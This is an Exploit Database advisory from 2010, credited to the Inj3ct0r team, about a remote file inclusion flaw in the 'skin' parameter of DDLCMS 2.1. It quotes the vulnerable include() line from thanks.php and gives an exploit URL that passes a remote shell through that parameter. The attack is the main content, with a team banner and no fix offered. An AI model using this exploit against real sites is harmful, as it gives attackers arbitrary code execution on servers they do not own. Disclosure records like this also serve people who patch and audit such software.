DDLCMS 2.1 – ‘skin’ Remote File Inclusion

• Exploit Database
• 6 阅读

• 作者： eidelweiss
  日期： 2010-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13736/

• ==============================================================
  DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability
  ==============================================================
  
  
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1########################################1
  0I'm eidelweiss member from Inj3ct0r Team1
  1########################################0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  Vendor:		www.ddlcms.com
  download:	http://www.ddlcms.com/download.php
  Author:		eidelweiss
  Contact:		g1xsystem[at]windowslive.com
  
  =====================================================================
  
  	-=[ Vuln Code ]=-
  
  [-] /thanks.php
  
  	include(WWWROOT . 'skins/' . $skin . '/header.php');	// line 46
  	include(WWWROOT . 'leftside.php');
  
  =====================================================================
  
  	-=[ P0C ]=-
  
  "skin" parameter in FILE thanks.php is not Defined which can allow remote attackers to execute arbitrary PHP code via a URL
  
  	-=[ exploit ]=-
  
  	http://127.0.0.1/thanks.php?skin= [inj3ct0r sh3ll]
  
  
  =========================| -=[ E0F ]=- |=========================